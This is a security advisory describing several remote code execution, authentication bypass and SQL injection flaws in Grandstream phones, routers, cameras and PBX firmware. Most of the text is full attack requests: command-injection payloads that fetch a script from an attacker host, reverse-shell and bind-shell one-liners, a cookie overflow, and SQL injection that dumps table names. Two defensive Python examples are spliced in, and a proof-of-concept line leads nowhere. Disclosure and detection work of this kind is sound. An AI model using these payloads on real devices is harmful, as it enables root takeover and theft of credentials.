CVE-2019-10655
Grandstream GAC2500 1.0.3.35, GXP2200 1.0.3.27, GVC3202 1.0.3.51, GXV3275 before 1.0.3.219 Beta, and GXV3240 before 1.0.3.219 Beta devices allow unauthenticated remote code execution via shell metacharacters in a /manager?action=getlogcat priority field, in conjunction with a buffer overflow (via the phonecookie cookie) to overwrite a data structure and consequently bypass authentication. This can be exploited remotely or via CSRF because the cookie can be placed in an Accept HTTP header in an XMLHttpRequest call to lighttpd.
Trustwave SpiderLabs Security Advisory TWSL2019-003:
Multiple Vulnerabilities in Grandstream Products

Published: 04/05/2019
Version: 3.0

Vendor: Grandstream (http://www.grandstream.com/)
Product: Audio/Video/Voip/Routers/Security Cameras
Version affected:

Pre-auth RCE:
GAC2500 – F/W version: 1.0.3.35
GVC3202 – F/W version: 1.0.3.51
GXP2200 – F/W version: 1.0.3.27 (end of life product)
GXV3275 – F/W version: 1.0.3.210
GXV3240 – F/W version: 1.0.3.210

Post Auth RCE:
GXV3611IR_HD – F/W version: 1.0.3.21
UCM6204 – F/W version: 1.0.18.12
GXV3370 – F/W version: 1.0.1.33
WP820 – F/W version: 1.0.1.15
GWN7000 – F/W version: 1.0.4.12
GWN7610 – F/W version: 1.0.8.9

Product description:
Various networking and communication solutions.

Finding 1: Unauthenticated Remote Code Execution for Multiple Grandstream Devices
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10655

The following Grandstream devices are vulnerable to unauthenticated remote code execution through the combination of a command injection vulnerability and an authentication bypass:

- GAC2500 (Audio Conferencing Unit) firmware versions 1.0.3.35 and prior
- GVC3202 (Video Conferencing Unit) firmware versions 1.0.3.51 and prior
- GXV3240 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXV3275 (VoIP Phone) firmware versions 1.0.3.210 and prior
- GXP2200 (VoIP Phone - End of Life Product) firmware versions 1.0.3.27 and prior

The “priority” parameter of the getlogcat API endpoint is vulnerable to command injection, resulting in a root shell:

Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat

When an invalid phonecookie value is supplied, the server correctly denies access to the API endpoints:

Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AABBCCDD"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat

Response:
===========================
HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49
Connection: close
Date: Tue, 04 Dec 2018 09:29:11 GMT
Server: IP Video Conferencing

Response=Error
Message=Authentication Required

However, supplying 93 A’s as the “phonecookie” cookie value causes a buffer overflow that overwrites the return value of the valid_connection function, so it returns 41 instead of 0. This bypasses the authentication checks in place and allows the command injection above to be triggered as an unauthenticated user.
Request:
===========================
GET /manager?action=getlogcat&region=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543915668008 HTTP/1.1
Host: 10.0.0.34
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.34/maintenance/logcat.html?ver=1.0.3.51
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; type=admin; Version="1"; Max-Age=900; tooltipdiv_closed=true; tooltipdiv_iconized=dock; needchange=1; ver=1.0.3.51; logindate=1543915659757; logout=-1; Mainpage=maintenance; Subpage=logcat

--------------------
mnz@anima:~/projects/grandstream/gvc3202$ nc -klvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.34 44947 received!
sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAglJliLIaeVoAC5/d7maJWH897v/QSpfywsmfwcl+ftyTN4uVdLHrfG3yO6NOjvE0uy4t10E+OA8zsJmoa4Y7q6oROjlOZKYfizr1i1unD6KK6YpQoDcYNZo62fR/LqenTnXG1eHCzT4RIWge6GXe6IGst+oJyY0QjF2lDowXNi0edlE= kehua@kehua-desktop
Fingerprint: md5 aa:47:1b:90:56:8f:e8:29:8d:f4:76:4b:66:fc:91:62
Public key portion is:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAmOqFoPWqhM0WlxSj56up/avu3DjMT2Rh8xDGLqVUjGz5Yttl2ozxZ5ZjeraEJvIjwANK7FnCxsE1BF+9+2MBSxvu1DQyyI2Iy7TcXMP08PcCPJhfHp/+wlCYdUnsJifvxSt49IuS09Ax0lPZuegU+UfXoBbGtIJ5Q1jC78L49pDClQMWIqlGRzMFvbA/KpHVFuUD+zGEAHrGKiEFDRbaPTCkmpxr4RYocE6P8RDkj0Ae71FuxXvxlYUr7+ikffKAvPtwBX5YsSZ4hBjXhX8F64StCJbVYI5CdZUBu2E4mbrirRkB8gHpAfc/Qq1/bNp+Pxi5JcZdpDDeht/6ZJI6snrbw== jacky@jacky-Lenovo
Fingerprint: md5 9e:1e:13:ab:fa:b2:ab:97:bb:31:60:d2:49:48:15:ff
/ #
--------------------

Additionally, the lighttpd binary doesn’t check that “phonecookie” actually came from the Cookie request header, so it can be sent in any header. As long as the request stays a so-called “simple request” (https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#Simple_requests), no CORS preflight occurs. XHR can set “phonecookie” in some of these safe request headers, which allows the unauthenticated RCE to be CSRF-sprayed to gain a reverse shell on non-public-facing devices.
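A defender-side check for the three indicators Finding 1 leaves in web traffic: shell metacharacters in the getlogcat "priority" parameter, a phonecookie that is not a short hex token (the overflow needs 93 bytes), and a phonecookie arriving in a header other than Cookie. This is an added example and not part of the advisory; the raw-request parser, the 16-character phonecookie ceiling, and the three sample requests are assumptions and constructions modelled on the captures above, not real traffic.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Legitimate sessions in the advisory carry an 8-hex-digit phonecookie, while the
# overflow needs 93 bytes. The 16-character ceiling is an assumption: well above
# the legitimate length, well below the overflow length.
PHONECOOKIE_RE = re.compile(r"^[0-9a-fA-F]{1,16}$")
SHELL_META = set(";|&$`{}()<>\n\r'\"\\")


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request (the format captured in the advisory) into
    (method, target, [(lower-cased header name, value), ...])."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    method, target = lines[0].split()[:2]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, target, headers


def parse_query(query):
    """Hand-rolled query parser: some urllib.parse.parse_qs versions also split
    on ';', which would hide the very characters we want to see."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def cookie_values(headers, name):
    """Every value of cookie `name` across all Cookie headers, quotes stripped."""
    values = []
    for hname, hvalue in headers:
        if hname != "cookie":
            continue
        for part in hvalue.split(";"):
            key, _, value = part.strip().partition("=")
            if key == name:
                values.append(value.strip().strip('"'))
    return values


def analyze_request(raw):
    """Return the list of indicators found in one raw request (empty if clean)."""
    findings = []
    _method, target, headers = parse_raw_request(raw)
    url = urlsplit(target)
    params = parse_query(url.query)

    # 1. Command injection: shell metacharacters in the getlogcat priority parameter.
    if url.path == "/manager" and params.get("action") == ["getlogcat"]:
        for prio in params.get("priority", []):
            if set(prio) & SHELL_META:
                findings.append("getlogcat priority contains shell metacharacters: %r" % prio)

    # 2. Auth bypass: a phonecookie that is not a short hex token (overflow attempt).
    for value in cookie_values(headers, "phonecookie"):
        if not PHONECOOKIE_RE.match(value):
            findings.append("phonecookie malformed or oversized (%d bytes)" % len(value))

    # 3. CSRF variant: phonecookie carried in a header other than Cookie.
    for hname, hvalue in headers:
        if hname != "cookie" and "phonecookie=" in hvalue:
            findings.append("phonecookie supplied in non-Cookie header %r" % hname)

    return findings


# Constructed sample requests modelled on the advisory's captures (not real traffic).
OVERFLOW_COOKIE = "A" * 93  # the length the advisory reports for the overflow
BENIGN = (
    "GET /manager?action=getlogcat&region=maintenance&tag=&priority=V&time=1543915668008 HTTP/1.1\n"
    "Host: 10.0.0.34\n"
    'Cookie: MyLanguage=en; phonecookie="66e67eb1"; type=admin\n\n'
)
INJECTION_WITH_OVERFLOW = (
    "GET /manager?action=getlogcat&region=maintenance&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1\n"
    "Host: 10.0.0.34\n"
    'Cookie: MyLanguage=en; phonecookie="%s"; type=admin\n\n' % OVERFLOW_COOKIE
)
HEADER_SMUGGLED = (
    "GET /manager?action=getlogcat&tag=&priority=;reboot;&time=1543915668008 HTTP/1.1\n"
    "Host: 10.0.0.34\n"
    "Accept: text/plain; phonecookie=%s\n\n" % OVERFLOW_COOKIE
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("overflow", INJECTION_WITH_OVERFLOW),
                          ("smuggled", HEADER_SMUGGLED)):
        print(label, "->", analyze_request(sample) or "clean")
```

The third check is the one worth keeping even after patching: a phonecookie value anywhere outside the Cookie header has no legitimate origin, so it is a low-noise indicator of the CSRF variant regardless of what the cookie value looks like.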
The following proof of concept shows how a malicious HTML page could be used to try and CSRF this:

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/gvc3202$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.0.0.53 4444>/tmp/f;

Finding 2: Remote Code Execution in Grandstream’s GWN7000 (Gigabit VPN router)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10656, CVE-2019-10657

Grandstream’s GWN7000 (Gigabit VPN router) firmware 1.0.4.12 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability. The “filename” parameter of the update_nds_webroot_from_tmp API call is vulnerable to blind command injection, resulting in a root shell:

Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 179
Connection: close
Cookie: userid=c99bfb25d88ce13d021e55b2ac2014a2; user=admin

{"jsonrpc":"2.0","id":127,"method":"call","params":["c99bfb25d88ce13d021e55b2ac2014a2","controller.icc","update_nds_webroot_from_tmp",{"filename":"/hihi.html';telnetd -lsh;#"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52

{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}

--------------------
mnz@anima:~/projects/grandstream/gwn7000$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

BusyBox v1.23.2 (2017-02-24 16:54:38 CST) built-in shell (ash)

/ # id
uid=0(root) gid=0(root)
/ #
--------------------

This area of functionality is only visible in the UI as admin; however, the ‘user’ account is still able to hit this API endpoint.
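How the update_nds_webroot_from_tmp handler in Finding 2 could be written so that the "filename" parameter never reaches a shell and the ‘user’ role cannot reach the method at all. This is an added example, not Grandstream's code: the JSON-RPC envelope shape follows the request above, while the role table, the copy-from-/tmp semantics, the SAFE_FILENAME_RE pattern and vulnerable_command() are assumptions made for illustration.

```python
import os
import re
import shutil
import tempfile

# Assumption: a staged web-root file is a plain file name (optionally prefixed
# with "/") with no path separators, no leading dot and no shell-significant characters.
SAFE_FILENAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class RpcError(Exception):
    """Raised by a handler; dispatch() turns it into a JSON-RPC error reply."""


def vulnerable_command(filename):
    """Hypothetical reconstruction of the flaw's shape: the parameter is spliced
    into a shell command line. Returned as a string only, never executed."""
    return "cp '/tmp/%s' '/www/nds/'" % filename


def handle_update_webroot(args, tmp_dir, webroot):
    """Hardened handler: validate the name, then copy without any shell."""
    filename = args.get("filename", "")
    name = filename[1:] if filename.startswith("/") else filename
    if not SAFE_FILENAME_RE.match(name):
        raise RpcError("invalid filename")
    src = os.path.join(tmp_dir, name)
    if not os.path.isfile(src):
        raise RpcError("no such staged file")
    shutil.copyfile(src, os.path.join(webroot, name))  # no subprocess, no shell
    return {"status": 0}


# Assumed role table: the advisory states this method is meant for admin only.
METHODS = {
    ("controller.icc", "update_nds_webroot_from_tmp"): ({"admin"}, handle_update_webroot),
}


def dispatch(request, session_role, tmp_dir, webroot):
    """Minimal JSON-RPC 'call' dispatcher using the advisory's envelope shape:
    params = [session_id, object, method, args]. The session id is assumed to
    have been resolved to session_role by the caller."""
    reply = {"jsonrpc": "2.0", "id": request.get("id")}
    try:
        _sid, obj, method, args = request["params"]
    except (KeyError, TypeError, ValueError):
        reply["error"] = "malformed request"
        return reply
    entry = METHODS.get((obj, method))
    if entry is None:
        reply["error"] = "unknown method"
        return reply
    allowed_roles, handler = entry
    if session_role not in allowed_roles:  # enforced per method, not per UI page
        reply["error"] = "permission denied"
        return reply
    try:
        reply["result"] = [0, handler(args, tmp_dir, webroot)]
    except RpcError as exc:
        reply["error"] = str(exc)
    return reply


def demo():
    """Exercise the dispatcher against throw-away directories standing in for
    /tmp and the web root; returns the replies for inspection."""
    def request(filename):
        return {"jsonrpc": "2.0", "id": 127, "method": "call",
                "params": ["SESSION-ID-PLACEHOLDER", "controller.icc",
                           "update_nds_webroot_from_tmp", {"filename": filename}]}

    with tempfile.TemporaryDirectory() as tmp_dir, tempfile.TemporaryDirectory() as webroot:
        with open(os.path.join(tmp_dir, "hihi.html"), "w") as fh:
            fh.write("<html>constructed staged page</html>")
        return {
            "admin_ok": dispatch(request("/hihi.html"), "admin", tmp_dir, webroot),
            "user_denied": dispatch(request("/hihi.html"), "user", tmp_dir, webroot),
            "injection_rejected": dispatch(request("/hihi.html';telnetd -lsh;#"), "admin", tmp_dir, webroot),
            "copied": os.path.isfile(os.path.join(webroot, "hihi.html")),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Two design points carry the weight: the role check lives in the dispatcher keyed on (object, method), so hiding a page in the UI is irrelevant, and the handler does file work with library calls rather than building a command line, so the single quote in the advisory's payload has nothing to close.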
Additionally, the ‘user’ account can retrieve the admin user’s password in plaintext (along with the rest of the device settings) with the following request, and then simply log in as admin.

Request:
===========================
POST /ubus/uci.apply HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 123
Connection: close
Cookie: userid=c847182f49ab267ff55d0870076a26c9; user=user

{"jsonrpc":"2.0","id":7,"method":"call","params":["c847182f49ab267ff55d0870076a26c9","uci","get",{"config":"grandstream"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 9574

{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","logserver_file_size":"5M","logserver_file_count":"56","logserver_rotate_mode":"1"},"general":{".anonymous":false,".type":"general",".name":"general",".index":1,"password_change_required":"1","ntp_server":["129.6.15.28"],"date_display":"0","role":"0","enable_sip_alg":"0","applied_patch":"1","web_wan_http":"1","pairing_key":"d[1#O+]LDp$?xFjY>kg$->j{``mu]=v;imuTM 9dfI}=(^1X+Wypr{a|CkYlt`9","failover_key":"H}um{L6@NQXhWdK|sqen7aHT_PuzY] L Vd@>.Wf8]V\\N=JA\"i(MtWET374jU}8","admin_password":"Password1","user_password":"Password1","web_port":"443" […]

Finding 3: Remote Code Execution in Grandstream’s GWN7610 (Wireless Access Point)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10658

Grandstream’s GWN7610 (Wireless Access Point) firmware version 1.0.8.9 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability.
The “filename” parameter of the update_nds_webroot_from_tmp API call is vulnerable to blind command injection.

Request:
===========================
POST /ubus/controller.icc.update_nds_webroot_from_tmp HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 177
Connection: close
Cookie: userid=817309838e44d88e62534d563598e60a; user=admin

{"jsonrpc":"2.0","id":127,"method":"call","params":["817309838e44d88e62534d563598e60a","controller.icc","update_nds_webroot_from_tmp",{"filename":"/hihi.html';telnetd -lsh;#"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 52

{"jsonrpc":"2.0","id":127,"result":[0,{"status":0}]}

--------------------
mnz@anima:~/projects/grandstream/gwn7610$ telnet 10.0.0.128
Trying 10.0.0.128...
Connected to 10.0.0.128.
Escape character is '^]'.

BusyBox v1.23.2 (2018-11-15 15:02:01 CST) built-in shell (ash)

/ # id
uid=0(root) gid=0(root)
/ #
--------------------

The update_nds_webroot_from_tmp API call is restricted to the admin account; however, the ‘user’ account can simply retrieve the admin user’s password in plaintext (along with the rest of the device settings) by issuing the following request:

Request:
===========================
POST /ubus/uci.get HTTP/1.1
Host: 10.0.0.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.128/
Content-Length: 123
Connection: close
Cookie: userid=452a422c775b1176109da724a7bb5c44; user=user

{"jsonrpc":"2.0","id":7,"method":"call","params":["452a422c775b1176109da724a7bb5c44","uci","get",{"config":"grandstream"}]}

Response:
===========================
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 3973

{"jsonrpc":"2.0","id":7,"result":[0,{"values":{"debug":{".anonymous":false,".type":"debug",".name":"debug",".index":0,"syslog_level":"1","syslog_uri":"10.0.0.125","log_level":"7"},"general":{".anonymous":false,".type":"general",".name":"general",".index":1,"ntp_server":["129.6.15.28"],"date_display":"0","role":"0","country":"840","applied_patch":"1","admin_password":"Password1","user_password":"Password1","pairing_key" […]

Finding 4: Remote Code Execution in Grandstream’s GXV3370 (VoIP Phone)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10659

Grandstream’s GXV3370 (VoIP Phone) firmware version 1.0.1.33 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability.
The “priority” parameter of the getlogcat API endpoint is vulnerable to command injection, resulting in a root shell.

The contents of x.sh are as follows:

mnz@anima:~/projects/grandstream/wp820$ cat x.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|busybox nc 10.0.0.53 4444>/tmp/f;

Request:
===========================
GET /manager?action=getlogcat&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&_=1543919505566 HTTP/1.1
Host: 10.0.0.74
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.84/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: MyLanguage=en; phonecookie="47028427"; type=admin; Version="1"; Max-Age=900; needchange=0; ver=1.0.1.15; logindate=1543919482990

----------------------------
mnz@anima:~/projects/grandstream/gxv3370$ nc -klvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.0.0.74 48349 received!
sh: can't find tty fd: No such device or address
sh: warning: won't have full job control
GXV3370:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:toolbox:s0
GXV3370:/ # cat /system/root/.ssh/authorized_keys
Public key portion is:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAla/bO1oj2G8FOcx+uFmVGeZTkJQ5R1yJc1HphyqcE4LuEoMJ+2KWITmP4ADe8etTd/ZjqkL+eeN+Terj4Z+pMXk40yoRw5+R6QBW1u1XZ/4GnHWoang9+44GQ4E+ZyGD6ba8tA/gXewS9gf/+XRqX5A321ol4KynLsYZ9+BLXpKGGf3dUc1HSZeeV0W1UvlGLHnzR1uBFueS8h5NrUpBkIEwfxYiLB3mDpRC0OpGrW2QK56dr7r3/DNPWZFtT3iBoiyrnv8oR/w3C2CiVTJdtnweYkl0yXMIxN/FEGRvVXCloIiEphcyXZlZHPtzO1uI1tftW2I6WdQEIAScOlDt9PJdQ== root@ub64-QiTianM4500-N000
Fingerprint: md5 98:ef:a2:13:27:60:14:d5:6a:8b:93:7a:5b:07:08:0f
GXV3370:/ #
------------------------------

Finding 5: Remote Code Execution in Grandstream’s GXV3611IR_HD (IP Camera)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10660, CVE-2019-10661

Grandstream’s GXV3611IR_HD (IP Camera) firmware version 1.0.3.21 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability. The “logserver” parameter of the “systemlog” API endpoint is vulnerable to command injection, which in the request below results in a telnet server running. The root account has no password.

Request:
===========================
GET /goform/systemlog?cmd=set&logserver=127.0.0.1%253Btelnetd%2524IFS-p5555&loglevel=0 HTTP/1.1
Host: 10.0.0.135
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.135/Pages/syslog.html
cache-control: no-cache
context-type: text/xml;charset=utf-8
Content-Type: application/x-www-form-encodeURIComponent
If-Modified-Since: 0
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close

----------------------------
mnz@anima:~/projects/grandstream/gxv3611IR_HD$ telnet 10.0.0.135 5555
Trying 10.0.0.135...
Connected to 10.0.0.135.
Escape character is '^]'.
MontaVista® Linux® Professional Edition 5.0.0 (0702774)
Linux/armv5tejl 2.6.18_pro500-davinci_evm-arm_v5t_le

localhost login: root
Welcome to MontaVista® Linux® Professional Edition 5.0.0 (0702774).

BusyBox v1.2.2 (2016.11.21-17:40+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

id: applet not found
id: applet not found
#
----------------------------

Finding 6: Remote Code Execution in Grandstream’s UCM6204 (IP PBX)
Credit: Brendan Scarvell of Trustwave
CVE: CVE-2019-10662, CVE-2019-10663

Grandstream’s UCM6204 (IP PBX) firmware version 1.0.18.12 and prior is vulnerable to remote code execution through a post-auth command injection vulnerability. The “file-backup” parameter of the backupUCMConfig API call is vulnerable to blind command injection.

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1287358962-1543933269; username=admin; user_id=0

action=backupUCMConfig&file-backup=backup_20181129_224405;reboot;.tar;+realtime

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0

action=backupUCMConfig&file-backup=backup_20181129_224405;x=$'busybox\x20nc\x20-l\x20-p\x201337\x20-e\x20sh';$x;.tar;+realtime

Then simply connect to the device for a root shell:

------------------------------
mnz@anima:~/projects/grandstream/ucm6204$ nc 10.0.0.65 1337
id
uid=0(root) gid=0(root) groups=0(root)
------------------------------

Additionally, the “sord” parameter of the listCodeblueGroup API call is vulnerable to SQL injection.

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 116
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0

action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,"noot noot",sqlite_version(),null;--&sidx=extension

Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 258
Connection: close
Date: Tue, 04 Dec 2018 14:40:26 GMT

{
  "response": {
    "codeblue_group": [
      { "extension": "2", "group_name": "apples", "members": "1001", "tmp": "2" },
      { "extension": null, "group_name": "noot noot", "members": "3.8.5", "tmp": null }
    ],
    "total_item": 1,
    "total_page": 1,
    "page": 1
  },
  "status": 0
}

Request:
===========================
POST /cgi? HTTP/1.1
Host: 10.0.0.65:8089
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.65:8089/system-status/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Connection: close
Cookie: TRACKID=48c52904a59538eb8c50288d6ebab821; session-identify=sid1479701649-1543933865; username=admin; user_id=0

action=listCodeblueGroup&item_num=10&page=1&sord=asc;select null,null,tbl_name,null FROM sqlite_master--&sidx=extension

Response:
===========================
HTTP/1.1 200 OK
Content-Type: application/json;charset=UTF-8
Server: Asterisk/1.8.9
Content-Length: 46541
Connection: close
Date: Tue, 04 Dec 2018 14:44:04 GMT

{
  "response": {
    "codeblue_group": [
      { "extension": "2", "group_name": "apples", "members": "1001", "tmp": "2" },
      { "extension": null, "group_name": null, "members": "privilege", "tmp": null },
      { "extension": null, "group_name": null, "members": "privilege", "tmp": null },
      { "extension": null, "group_name": null, "members": "privilege", "tmp": null },
      { "extension": null, "group_name": null, "members": "languages", "tmp": null },
      { "extension": null, "group_name": null, "members": "languages", "tmp": null },
      { "extension": null, "group_name": null, "members": "language_settings", "tmp": null },
      { "extension": null, "group_name": null, "members": "sqlite_sequence", "tmp": null },
      { "extension": null, "group_name": null, "members": "numbers", "tmp": null },
      { "extension": null, "group_name": null, "members": "numbers", "tmp": null },
      { "extension": null, "group_name": null, "members": "dhcp_settings", "tmp": null },
      { "extension": null, "group_name": null, "members": "dhcp6_settings", "tmp": null },
      { "extension": null, "group_name": null, "members": "static_routes", "tmp": null },
      { "extension": null, "group_name": null, "members": "static_routes", "tmp": null },
      { "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
      { "extension": null, "group_name": null, "members": "ipv6_static_routes", "tmp": null },
      { "extension": null, "group_name": null, "members": "typical_firewallsettings", "tmp": null },
      { "extension": null, "group_name": null, "members": "static_defense", "tmp": null },
      { "extension": null, "group_name": null, "members": "static_defense", "tmp": null },
